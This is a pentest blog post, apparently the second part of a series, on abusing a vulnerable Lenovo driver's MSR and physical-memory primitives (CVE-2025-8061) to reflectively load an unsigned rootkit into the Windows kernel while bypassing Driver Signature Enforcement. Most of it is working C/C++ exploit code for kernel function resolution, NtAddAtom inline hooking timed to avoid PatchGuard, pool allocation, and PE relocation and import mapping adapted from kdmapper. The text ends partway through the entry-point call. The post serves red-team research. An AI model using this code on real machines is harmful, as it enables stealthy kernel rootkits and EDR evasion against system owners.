BYOVD to the next level (part 2) — rootkit like it's 2025

Posted Thu 09 October 2025
Author Luis Casvella
Category Pentest
Tags 2025, windows, driver, pentest, vulnerability, exploit, CVE-2025-8061

Bring Your Own Vulnerable Driver (BYOVD) is a well-known post-exploitation technique used by adversaries. This blog post is part of a series. In part one we saw how to abuse a vulnerable driver to gain access to Ring-0 capabilities. In this second and final part, we provide a technical explanation of how to perform reflective driver loading.

Introduction

In the first part of this series, we saw how a driver could be exploited via logical bugs to gain exploitation primitives such as:

Arbitrary read/write on MSR registers.
Read/write to physical memory address via insecure calls to MmMapIoSpace().

Having demonstrated Local Privilege Escalation (LPE) exploitation, we will now see how to go even further! Let's do a deep dive into the Windows Kernel and see how an attacker can abuse R/W primitives to manually map their own unsigned driver and completely bypass Driver Signature Enforcement (DSE).

👀 Please make sure to read the first part
This blog post is the direct continuation of the first part available here!

State of the art on Reflective Driver Loading

First, let's define what "Reflective Driver Loading" is. Reflective loading refers to the ability of a program to load an executable directly from memory instead of from a file using the normal OS loading method. Because it bypasses disk-based loading and standard OS mechanisms, reflective loading has been widely used by malware to hide its execution. As this technique can be used to hide the execution of a .DLL or an .EXE, it can also be used to load a driver directly into kernel memory.

During my research on reflective driver loading I found surprisingly few public write-ups, which motivated me to document how the technique works. Most of the material I did find came from game-cheat developers on the UnknownCheats forum. Because anti-cheat systems operate at kernel privilege, cheat authors commonly use drivers to manipulate game state, and there is a notable overlap between the capabilities used by cheat developers and those used by red teams against EDR. A widely used tool from that community is kdmapper which implements reflective loading of unsigned drivers; many of the techniques discussed in this article are inspired by kdmapper’s approach.

Kdmapper uses a well-known vulnerable driver named iqvw64e.sys to obtain an arbitrary R/W primitive on virtual and physical addresses. Because this driver is now detected and blacklisted by Microsoft, it is unsuitable for Red Team engagements. The mapping techniques kdmapper introduced, however, are transferable: by substituting a different, undetected vulnerable driver you can achieve the same results, with similar primitives. So let's reuse the vulnerabilities found in LnvMSRIO.sys that I presented in the first blog post and use these primitives to load our unsigned driver (basically, a rootkit).

Gaining unrestricted kernel code execution

Invoking Windows NT Kernel API

With the MSR write primitive we demonstrated a simple privilege escalation and ran userland-allocated shellcode in ring 0 to steal a SYSTEM token. However, the primitive’s power goes well beyond that. Once your payload executes in kernel context it can directly call functions inside ntoskrnl.exe and reuse kernel-internal APIs. To do so, you need to resolve the kernel addresses of the target functions.

A common, straightforward workflow is to map the same ntoskrnl.exe image in user mode, use GetProcAddress() to obtain the export's offset inside that image, and then add that offset to the kernel's runtime base address to compute the function's kernel-space address. This yields a quick way to call exported kernel routines from your ring-0 payload. Here is a quick code snippet in C/C++ to do that:

// Get the offset of an exported function relative to its module base (0 on failure)
uint64_t GetFunctionOffsetFromModule(const char* ModuleName, const char* FunctionName) {
    HMODULE hModule = LoadLibraryA(ModuleName);
    if (!hModule) return 0;
    FARPROC pFunction = GetProcAddress(hModule, FunctionName);
    // Return 0 when the export is missing instead of a wrapped-around offset
    uint64_t qFunctionOffset = pFunction ? (uint64_t)pFunction - (uint64_t)hModule : 0;
    FreeLibrary(hModule);
    return qFunctionOffset;
}

// Get the kernel address of a function exported by ntoskrnl.exe (0 on failure)
uint64_t GetKRoutine(uint64_t qKernelBase, const char* FunctionName){
    uint64_t qFunctionOffset = GetFunctionOffsetFromModule("C:\\Windows\\System32\\ntoskrnl.exe", FunctionName);
    if (qFunctionOffset == 0) return 0;
    return qKernelBase + qFunctionOffset;
}

Then, we can call the GetKRoutine() function to retrieve any exported function in the Windows Kernel.

uint64_t qDbgPrint = GetKRoutine(qKernelBaseAddress, "DbgPrint");

Finally, we can use the MSR write primitive and make a direct call to the function pointer qDbgPrint() (after preparing the stack to store the needed parameters). Now, let's abuse this to reflectively load an unsigned driver into the Windows kernel.

Windows Internals

However, before loading our own unsigned driver, we need to know a few things about the kernel internals.

Windows pool allocation

The Windows pool is the kernel’s general-purpose allocator for variable-sized memory chunks and it is very similar to a user-mode heap but with important differences. In fact, pool allocations live in kernel space and are globally visible to all kernel-mode components, and because of that, corrupting pool memory can affect the whole kernel, causing driver failures or a system crash (BSOD). It is critical to treat pool operations with care and validate sizes, tags, and lifetimes to avoid destabilizing the system.

To ensure the integrity of Windows pool areas, every allocated chunk starts with this header:

// https://www.vergiliusproject.com/kernels/x64/windows-11/24h2/_POOL_HEADER

//0x10 bytes (sizeof)
struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize:8;       //0x0
            USHORT PoolIndex:8;          //0x0
            USHORT BlockSize:8;          //0x2
            USHORT PoolType:8;           //0x2
        };
        ULONG Ulong1;                    //0x0
    };
    ULONG PoolTag;                       //0x4
    union
    {
        struct _EPROCESS* ProcessBilled; //0x8
        struct
        {
            USHORT AllocatorBackTraceIndex;  //0x8
            USHORT PoolTagHash;              //0xa
        };
    };
};

In this header, we can find some valuable information about the memory chunk, such as its size (BlockSize), its type (PoolType) and its tag (PoolTag).
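
To make the layout above concrete, here is a minimal sketch that splits the first 32-bit word of the header (Ulong1) into its four 8-bit fields. The struct and function names are hypothetical, and the sketch assumes the bitfields are packed from the least significant bit upward, as the offsets in the structure above suggest.

```cpp
#include <cstdint>

// Hypothetical helper type: the four 8-bit fields packed in _POOL_HEADER.Ulong1.
struct PoolHeaderFields {
    uint8_t previous_size;  // bits 0-7
    uint8_t pool_index;     // bits 8-15
    uint8_t block_size;     // bits 16-23
    uint8_t pool_type;      // bits 24-31
};

// Split Ulong1 into its fields (assumes low-to-high bitfield packing).
constexpr PoolHeaderFields DecodePoolHeaderUlong1(uint32_t ulong1) {
    return PoolHeaderFields{
        static_cast<uint8_t>(ulong1 & 0xFF),
        static_cast<uint8_t>((ulong1 >> 8) & 0xFF),
        static_cast<uint8_t>((ulong1 >> 16) & 0xFF),
        static_cast<uint8_t>((ulong1 >> 24) & 0xFF)
    };
}
```

Feeding it the first ULONG of a chunk header read from a debugger gives back the same BlockSize and PoolType values that the structure describes.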

The PoolTag is just a short identifier specified when allocating the region. Usually, it is a ULONG representing four ASCII characters, and it can be useful for debugging purposes.

The different pool types are fortunately documented by Microsoft. Dozens of pool types are available, but they fall into two main groups:

PagedPool, which is allocated in a memory region that can be paged out to disk when memory is scarce, much like swap.
NonPagedPool, which always stays resident in RAM.

Interrupt Request Level (IRQL)

Interrupt Request Level (IRQL) defines the priority at which the CPU is currently running. Higher IRQLs block delivery of lower-priority interrupts and restrict which kernel services and memory types the running code may safely access. Normal threads and most kernel code execute at PASSIVE_LEVEL (IRQL 0), which is the lowest IRQL and allows access to pageable memory and most kernel routines. However, some specialized contexts run at a higher IRQL, where accessing paged pool memory can crash the system. When the MSR write primitive is exploited, code execution is obtained by hijacking the syscall handler in the kernel itself, so the IRQL is set to a high value.

But why is it so important?

As I mentioned, running at a high IRQL prevents the kernel from executing many internal functions, in particular any routine that touches pageable memory. At high IRQL, the kernel may not access pages that can be paged out and calling such routines or copying from/to pageable memory commonly triggers a BSOD with the code IRQL_NOT_LESS_OR_EQUAL. To freely call those APIs and safely access pageable pool, code must execute at PASSIVE_LEVEL. That means, in practice, you must execute your payload in a low-IRQL context.

Hooking the kernel

The goal is to redirect execution into a context that runs at a low IRQL. To achieve this, we can place an inline hook on a specific syscall implementation inside ntoskrnl.exe and then invoke that syscall from user mode. That way, the code-execution primitive is exercised from the syscall’s implementation itself (which runs at PASSIVE_LEVEL), rather than from a direct hijack of KiSystemCall64().

The chosen target is NtAddAtom(), because it is rarely used by typical user applications and is therefore a convenient, low-noise entry point.

The main obstacle is that ntoskrnl.exe is mapped in kernel memory as read-only, so we cannot patch it directly through an ordinary write. To bypass this restriction, we can use the physical read/write primitive described in the previous blog post. The physical memory can be mapped into a virtual address space with MmMapIoSpace(), which returns a writable region (even when the source area is read-only!). Using that writable mapping we can install an inline jump at the start of the NtAddAtom() stub that redirects execution to a handler or trampoline.

🛡️ Kernel Patch Protection (KPP) a.k.a PatchGuard
When setting hooks in the kernel, PatchGuard might catch them and cause a BSOD. Therefore, those hooks need to be removed as quickly as possible to restore the integrity of the kernel.

In order to use the physical read/write primitive, we need to know the physical address of NtAddAtom(). Fortunately, we can obtain it by abusing the MSR read/write primitive to call MmGetPhysicalAddress(), as this function returns the physical address corresponding to a given virtual address.

Figure 1 - Documentation of MmGetPhysicalAddress().

Using the physical R/W primitive, we can patch the NtAddAtom() stub to redirect execution to another kernel function by inserting a jump at the start of the stub. In practice this is implemented with a small trampoline that redirects control to another region and then restores the original bytes to not trigger PatchGuard. The physical mapping lets us modify the kernel pages in-place so the hook takes effect when the syscall is invoked.

Trampoline stub (Replace XXXXXXXXXXXXXXXX with the address of any function inside ntoskrnl.exe):

0:  48 b8 XX XX XX XX XX    movabs rax, 0xXXXXXXXXXXXXXXXX
7:  XX XX XX
a:  ff e0                   jmp    rax
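
As an illustration of the encoding above, the following sketch fills the 8-byte immediate of the stub with a 64-bit address. BuildTrampoline is a hypothetical helper name, and the sketch assumes a little-endian host so that memcpy produces the byte order expected by movabs.

```cpp
#include <array>
#include <cstdint>
#include <cstring>

// Hypothetical helper: encode "movabs rax, target ; jmp rax" as 12 bytes.
std::array<uint8_t, 12> BuildTrampoline(uint64_t target) {
    std::array<uint8_t, 12> stub = {
        0x48, 0xB8,               // movabs rax, imm64
        0, 0, 0, 0, 0, 0, 0, 0,   // imm64 placeholder
        0xFF, 0xE0                // jmp rax
    };
    // The immediate is stored little-endian, matching an x64 host's layout.
    std::memcpy(stub.data() + 2, &target, sizeof(target));
    return stub;
}
```

Keeping the encoding in one function avoids repeating the same byte array at every call site.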

Figure 2 - Schema of the inline hook placement in the NtAddAtom() stub.

Finally, we just have to call NtAddAtom() from userland, where it is exported by ntdll.dll. During the syscall, this reaches NtAddAtom() in ntoskrnl.exe and triggers the hook, which redirects the execution flow to an arbitrary Windows kernel function, for example ExAllocatePoolWithTag(). Right after the execution, we need to remove the hook so that PatchGuard does not catch it.

Figure 3 - Schema of the execution of a kernel function (ExAllocatePoolWithTag() as an example) with the hook.

Reflective Driver Loading

In this section, we will see how to reflectively load a Windows driver. For testing purposes, we will use Nidhogg, a Windows rootkit with many useful offensive functionalities. This driver needs to be compiled with the -Gs option, which disables security check features, and with the DRIVER_REFLECTIVELY_LOADED definition added.

Allocate memory for our new unsigned driver

To allocate pool memory in kernel space we call ExAllocatePoolWithTag(). Before allocating, we need to read the driver image to determine the exact required size. This ensures you reserve a block large enough for any payload.

    /* 1.2 - Prepare driver data */
    const std::wstring driver_path = L"C:/path/to/Nidhogg.sys";
    std::vector<uint8_t> raw_image = { 0 };
    if (!ReadFileToMemory(driver_path, &raw_image)) {
        printf("[-] Failed to read image to memory");
        return;
    }
    const PIMAGE_NT_HEADERS64 nt_headers = PE::GetNtHeaders(raw_image.data());
    image_size = nt_headers->OptionalHeader.SizeOfImage;
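
For readers without the PE helper class at hand, here is a minimal, self-contained sketch of how SizeOfImage can be read from a raw 64-bit PE file using fixed header offsets. ReadAt and ReadSizeOfImage64 are hypothetical names that are not part of the project above, and the sketch assumes a little-endian host and C++17.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Bounds-checked read of a trivially copyable value at a byte offset.
template <typename T>
static std::optional<T> ReadAt(const std::vector<uint8_t>& buf, size_t offset) {
    if (offset > buf.size() || buf.size() - offset < sizeof(T)) return std::nullopt;
    T value;
    std::memcpy(&value, buf.data() + offset, sizeof(T));
    return value;
}

// Returns OptionalHeader.SizeOfImage of a PE32+ file, or nullopt if invalid.
std::optional<uint32_t> ReadSizeOfImage64(const std::vector<uint8_t>& file) {
    auto mz = ReadAt<uint16_t>(file, 0);
    if (!mz || *mz != 0x5A4D) return std::nullopt;        // "MZ"
    auto e_lfanew = ReadAt<uint32_t>(file, 0x3C);         // offset of NT headers
    if (!e_lfanew) return std::nullopt;
    auto signature = ReadAt<uint32_t>(file, *e_lfanew);
    if (!signature || *signature != 0x00004550) return std::nullopt;  // "PE\0\0"
    // Optional header follows the 4-byte signature and the 20-byte file header.
    const size_t optional_header = static_cast<size_t>(*e_lfanew) + 4 + 20;
    auto magic = ReadAt<uint16_t>(file, optional_header);
    if (!magic || *magic != 0x20B) return std::nullopt;   // PE32+ only
    return ReadAt<uint32_t>(file, optional_header + 56);  // SizeOfImage
}
```

Every read is bounds-checked, so a truncated or malformed file yields an empty result instead of an out-of-bounds access.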

Then, we can use the hooking technique to make a call to ExAllocatePoolWithTag().

// Import struct from https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ne-wdm-_pool_type
typedef enum _POOL_TYPE {
    NonPagedPool,
    NonPagedPoolExecute = NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed = NonPagedPool + 2,
    DontUseThisType,
    NonPagedPoolCacheAligned = NonPagedPool + 4,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
    MaxPoolType,
    NonPagedPoolBase = 0,
    NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
    NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
    NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
    NonPagedPoolSession = 32,
    PagedPoolSession = NonPagedPoolSession + 1,
    NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
    DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
    NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
    PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
    NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
    NonPagedPoolNx = 512,
    NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
    NonPagedPoolSessionNx = NonPagedPoolNx + 32,

} POOL_TYPE;

// Executes ExAllocatePoolWithTag() from user-land by abusing the R/W primitive to hook NtAddAtom()
PVOID _ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag){

    // Retrieve NtAddAtom() address in userland
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return nullptr;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom){
        return nullptr;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp rax ;

    // Place address of ExAllocatePoolWithTag in the trampoline
    memcpy(hook + 2, &pExAllocatePoolWithTag, 8);

    // Store original bytes in NtAddAtom() prologue
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12);

    // Write hook trampoline
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12);

    // Verifying the hook is correctly set
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); 
    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    // Prepare the stack with argument for ExAllocatePoolWithTag() and call NtAddAtom()
    using FunctionFn = PVOID(__stdcall*)(POOL_TYPE, SIZE_T, ULONG); // ExAllocatePoolWithTag() returns the pool address
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
    PVOID out_result = Function(PoolType, NumberOfBytes, Tag);

    // Restore NtAddAtom() stub
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12);

    return out_result;
}

Then, we can just call this function to hook NtAddAtom(), make the call to ExAllocatePoolWithTag() and unhook. The size needed is the size of the driver image. For the tag, you can put anything you want; for this example, I will use the tag VULN.

uint64_t ExAllocatePoolWithTag_Result = (uint64_t) _ExAllocatePoolWithTag(NonPagedPool, image_size, (ULONG)'NLUV');
printf("[+] Pool allocated at 0x%llX\n", ExAllocatePoolWithTag_Result);

🔄 Endianness
Note that due to endianness, the pool tag bytes are stored in reverse order in the allocation block header. The literal 'NLUV' therefore shows up as the tag "VULN" in WinDbg.

Result:

Figure 4 - Result of the allocation.

To ensure the allocation is correct, we can use WinDbg to get the information about the pool allocated at the given address with the command kd> !pool <address>. Below, you can see that WinDbg correctly found a large nonpaged pool with the tag we have set earlier.

Figure 5 - Allocation pool correctly set in WinDbg.
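
The byte order of the pool tag mentioned in the note above can be checked with a small sketch. MakePoolTag and PoolTagToString are hypothetical helpers. The multi-character literal 'NLUV' is implementation-defined, so the sketch builds the value explicitly; with MSVC the literal is expected to evaluate to the same number.

```cpp
#include <cstdint>
#include <string>

// Pack four ASCII characters so that the first one lands in the lowest byte,
// which is the first byte in memory on a little-endian machine.
constexpr uint32_t MakePoolTag(char a, char b, char c, char d) {
    return  static_cast<uint32_t>(static_cast<unsigned char>(a))
         | (static_cast<uint32_t>(static_cast<unsigned char>(b)) << 8)
         | (static_cast<uint32_t>(static_cast<unsigned char>(c)) << 16)
         | (static_cast<uint32_t>(static_cast<unsigned char>(d)) << 24);
}

// Render a tag the way it reads from memory: lowest byte first.
std::string PoolTagToString(uint32_t tag) {
    std::string text(4, '\0');
    for (int i = 0; i < 4; ++i)
        text[i] = static_cast<char>((tag >> (8 * i)) & 0xFF);
    return text;
}
```

Here MakePoolTag('V', 'U', 'L', 'N') yields 0x4E4C5556, and reading that value back byte by byte from the lowest address gives "VULN".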

Resolve imports and relocation

The pool region we have allocated is where the driver will be written and executed. By default, pages allocated with the NonPagedPool pool type are RWX, so we do not need to change the memory page permissions.

However, we need to relocate the driver and resolve its imports. As you might know, .sys files are just Portable Executables (PE). The main practical difference from a .dll or an .exe is that drivers typically import from the kernel image (ntoskrnl.exe) rather than from user-mode libraries. The import resolver shown below simplifies things by assuming that all imports resolve into the kernel image itself, but it worked fine for all the unsigned drivers I tested.

PE parsing and reflective loading work the same in kernel space as in user space. The only difference is the target base. For convenience I build and relocate the image in userland, allocate a temporary buffer with VirtualAlloc(), apply relocations using the pool base obtained from ExAllocatePoolWithTag() and then copy the prepared image into the kernel pool. The copy is performed using the physical read/write primitive so the kernel pool receives the fully-relocated image ready to execute.

/* 9 - Map Driver */
/* 9.1 - Map driver in local memory */
uint64_t local_image_base;
uint64_t qEntryPointAddress = MapDriver(raw_image.data(), raw_image.size(), qKernelBaseAddress, ExAllocatePoolWithTag_Result, &local_image_base, false);

printf("[+] Local image base : 0x%llX\n", local_image_base);
printf("[+] Local image size : %lld bytes\n", image_size);
assert(qEntryPointAddress != 0);
assert(local_image_base != 0);

The code snippets below are taken from kdmapper (slightly modified):

Main reflective driver mapping function:

// This function allocates a user-land memory region and maps the driver in it, relocated for the base address given in AllocationPoolVA.
ULONG64 MapDriver(unsigned char* DriverData, uint64_t Size, uint64_t KernelBase, uint64_t AllocationPoolVA, uint64_t* local_image, bool destroyHeader) {
    const PIMAGE_NT_HEADERS64 nt_headers = PE::GetNtHeaders(DriverData);
    auto kernel_image_base = AllocationPoolVA;

    if (!nt_headers) {
        printf("[-] Invalid format of PE image\n");
        return false;
    }
    if (nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
        printf("[-] PE is not 64 bits\n");
        return false;
    }

    // Get size of the driver image
    ULONG32 image_size = nt_headers->OptionalHeader.SizeOfImage;

    // Allocate user-land memory region as temp buffer.
    void* local_image_base = VirtualAlloc(nullptr, image_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    // Check the allocation before using the pointer
    if (!local_image_base)
        return false;

    printf("[+] Preparing driver in local memory at 0x%p\n", local_image_base);

    DWORD TotalVirtualHeaderSize = (IMAGE_FIRST_SECTION(nt_headers))->VirtualAddress;

    // Copy image headers
    memcpy(local_image_base, DriverData, nt_headers->OptionalHeader.SizeOfHeaders);

    // Copy image sections
    const PIMAGE_SECTION_HEADER current_image_section = IMAGE_FIRST_SECTION(nt_headers);

        for (auto i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
            if ((current_image_section[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA) > 0)
                continue;
            auto local_section = reinterpret_cast<void*>(reinterpret_cast<ULONG64>(local_image_base) + current_image_section[i].VirtualAddress);
            memcpy(local_section, reinterpret_cast<void*>(reinterpret_cast<ULONG64>(DriverData) + current_image_section[i].PointerToRawData), current_image_section[i].SizeOfRawData);
        }

        ULONG64 realBase = kernel_image_base;

        if (destroyHeader) {
            kernel_image_base -= TotalVirtualHeaderSize;
        }

        // Resolve relocs and imports
        RelocateImageByDelta(PE::GetRelocs(local_image_base), kernel_image_base - nt_headers->OptionalHeader.ImageBase);

        if (!ResolveImports(PE::GetImports(local_image_base), KernelBase)) {
            return 0x00;
        }

        // Hand the prepared local image back to the caller, which copies it to the allocated pool
        *local_image = (uint64_t) local_image_base;
        const ULONG64 address_of_entry_point = kernel_image_base + nt_headers->OptionalHeader.AddressOfEntryPoint;
        return address_of_entry_point;
}

Resolve imports:

PE::vec_imports PE::GetImports(void* image_base) {
    const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base);

    if (!nt_headers)
        return {};

    // Get imports table section from the NT headers
    DWORD import_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

    // If the driver does not import any function, return early.
    if (!import_va)
        return {};

    vec_imports imports;

    auto current_import_descriptor = reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(reinterpret_cast<ULONG64>(image_base) + import_va);

    // Loop on all imports
    while (current_import_descriptor->FirstThunk) {
        ImportInfo import_info;

        // Retrieve the module information
        import_info.ModuleName = std::string(reinterpret_cast<char*>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->Name));

        auto current_first_thunk = reinterpret_cast<PIMAGE_THUNK_DATA64>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->FirstThunk);
        auto current_originalFirstThunk = reinterpret_cast<PIMAGE_THUNK_DATA64>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->OriginalFirstThunk);

        // Loop on all imported function of this module
        while (current_originalFirstThunk->u1.Function) {
            ImportFunctionInfo import_function_data;

            // Retrieve the function information
            auto thunk_data = reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(reinterpret_cast<ULONG64>(image_base) + current_originalFirstThunk->u1.AddressOfData);

            import_function_data.Name = thunk_data->Name;
            import_function_data.Address = &current_first_thunk->u1.Function;

            import_info.FunctionData.push_back(import_function_data);

            ++current_originalFirstThunk;
            ++current_first_thunk;
        }

        // Add the information on a list
        imports.push_back(import_info);
        ++current_import_descriptor;
    }

    // Return the list
    return imports;
}

bool ResolveImports(PE::vec_imports imports, uint64_t kernel_image_base) {
    for (auto& current_import : imports) {
        printf("[+] Module: %s\n", current_import.ModuleName.c_str());

        // For all imports
        for (auto& current_function_data : current_import.FunctionData) {
            // Retrieve the real address of the function. (Assuming it is in ntoskrnl.exe for simplicity)
            ULONG64 function_address = GetKRoutine(kernel_image_base, current_function_data.Name.c_str());

            if (function_address == 0) {
                printf("Could not locate %s\n", current_function_data.Name.c_str());
                return false;
            }
            printf("\t[+] %s at 0x%llX\n", current_function_data.Name.c_str(), function_address);
            *current_function_data.Address = function_address;
        }
    }
    return true;
}

Relocation:

PE::vec_relocs PE::GetRelocs(void* image_base) {
    const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base);

    if (!nt_headers)
        return {};

    // Get relocation table section from the NT headers
    vec_relocs relocs;
    DWORD reloc_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;

    // If no relocation is needed, return early
    if (!reloc_va)
        return {};

    auto current_base_relocation = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(image_base) + reloc_va);
    const auto reloc_end = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(current_base_relocation) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size);

    // For each relocation block
    while (current_base_relocation < reloc_end && current_base_relocation->SizeOfBlock) {
        RelocInfo reloc_info;

        // Add the relocation information in the list
        reloc_info.Address = reinterpret_cast<ULONG64>(image_base) + current_base_relocation->VirtualAddress;
        reloc_info.Item = reinterpret_cast<USHORT*>(reinterpret_cast<ULONG64>(current_base_relocation) + sizeof(IMAGE_BASE_RELOCATION));
        reloc_info.Count = (current_base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT);

        relocs.push_back(reloc_info);

        current_base_relocation = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(current_base_relocation) + current_base_relocation->SizeOfBlock);
    }

    // Return relocation list
    return relocs;
}

void RelocateImageByDelta(PE::vec_relocs relocs, const ULONG64 delta) {
    // For each relocation needed
    for (const auto& current_reloc : relocs) {
        for (auto i = 0u; i < current_reloc.Count; ++i) {
            const uint16_t type = current_reloc.Item[i] >> 12;
            const uint16_t offset = current_reloc.Item[i] & 0xFFF;

            // Apply the delta to 64-bit absolute addresses
            if (type == IMAGE_REL_BASED_DIR64)
                *reinterpret_cast<ULONG64*>(current_reloc.Address + offset) += delta;
        }
    }
}
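
To illustrate the entry format used by the relocation loop above, here is a self-contained sketch that decodes 16-bit relocation entries and applies a delta to a byte buffer. The names DecodeRelocEntry and ApplyRelocBlock are hypothetical, the constants mirror IMAGE_REL_BASED_DIR64 (10) from the PE format, and a little-endian host is assumed.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr uint16_t kRelBasedDir64 = 10;  // same value as IMAGE_REL_BASED_DIR64

struct RelocEntry {
    uint16_t type;    // upper 4 bits of the raw entry
    uint16_t offset;  // lower 12 bits: offset inside the 4 KiB page
};

constexpr RelocEntry DecodeRelocEntry(uint16_t raw) {
    return RelocEntry{ static_cast<uint16_t>(raw >> 12),
                       static_cast<uint16_t>(raw & 0x0FFF) };
}

// Apply one relocation block to an image held in a local buffer.
// page_rva is the VirtualAddress field of the block header.
void ApplyRelocBlock(std::vector<uint8_t>& image, uint32_t page_rva,
                     const std::vector<uint16_t>& entries, uint64_t delta) {
    for (uint16_t raw : entries) {
        const RelocEntry entry = DecodeRelocEntry(raw);
        if (entry.type != kRelBasedDir64) continue;  // skip padding and other types
        const size_t pos = static_cast<size_t>(page_rva) + entry.offset;
        if (pos > image.size() || image.size() - pos < sizeof(uint64_t)) continue;
        uint64_t value;
        std::memcpy(&value, image.data() + pos, sizeof(value));
        value += delta;  // rebase the absolute address
        std::memcpy(image.data() + pos, &value, sizeof(value));
    }
}
```

Using memcpy instead of a pointer cast avoids unaligned access, and the bounds check skips entries that would point outside the buffer.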

Write the driver to kernel memory

Now that the driver is correctly relocated and the imported functions have been resolved, we can copy the userland region to our allocated kernel pool using the same hooking technique. To do so, we can use the function RtlCopyMemory() from ntoskrnl.exe.

void _RtlCopyMemory(void* Destination, const void* Source, size_t Length) {

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom)
    {
        return;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp rax ;
    // Place address of RtlCopyMemory in the trampoline
    memcpy(hook + 2, &pRtlCopyMemory, 8);
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Store original bytes in NtAddAtom() prologue
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12); // Write hook trampoline
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Verifying the hook is correctly set
    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    using FunctionFn = void(__stdcall*)(void*, const void*, size_t);
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);

    Function(Destination, Source, Length);

    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12); // Restore original function

    return;
}

In WinDbg, we can see the allocated pool now contains our rootkit by inspecting the content of the pool.

Figure 6 - Rootkit written in the allocated pool.

Call the entrypoint

Now, we can call the entrypoint, once again abusing the hooking technique. The entrypoint is retrieved from the NT headers when mapping the driver, and resolves to the function DriverEntry().

NTSTATUS _CallDriverEntry(uint64_t Entrypoint) {

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return -1;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom)
    {
        return -1;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp rax ;
    // Place address of the DriverEntry in the trampoline
    memcpy(hook + 2, &Entrypoint, 8);
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Store original bytes in NtAddAtom() prologue
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12); // Write hook trampoline
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Verifying the hook is correctly set
